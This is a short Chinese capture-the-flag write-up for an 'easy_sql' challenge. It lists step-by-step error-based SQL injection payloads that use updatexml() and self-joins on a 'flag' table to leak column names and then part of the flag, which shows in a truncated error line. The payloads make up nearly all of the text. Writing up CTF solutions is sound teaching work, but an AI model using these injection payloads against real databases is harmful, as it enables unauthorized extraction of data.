easy_sql
1、通过报错注入获取flag的字段名id
1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b)c)),0x2e)#
2、通过的方式获取flag的字段名no
1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id))c)),0x2e)#
3、在获取id及之后字段名no字段名’b803ed64-14a9-474f-9832-b854b23d3014’
1') or updatexml(0x2e,concat(0x2e,(select * from(select * from flag as a join flag b using(id,no))c)),0x2e)#
4、通过字段名获取flag的一部分
需要将单引号该成反引号
`b803ed64-14a9-474f-9832-b854b23d3014`
1') or updatexml(0x2e,concat(0x2e,(select `b803ed64-14a9-474f-9832-b854b23d3014` from flag)),0x2e)#
TH syntax error: 'CISCN{z9ZeE-peOfv-Wemp4-GE5FV-51&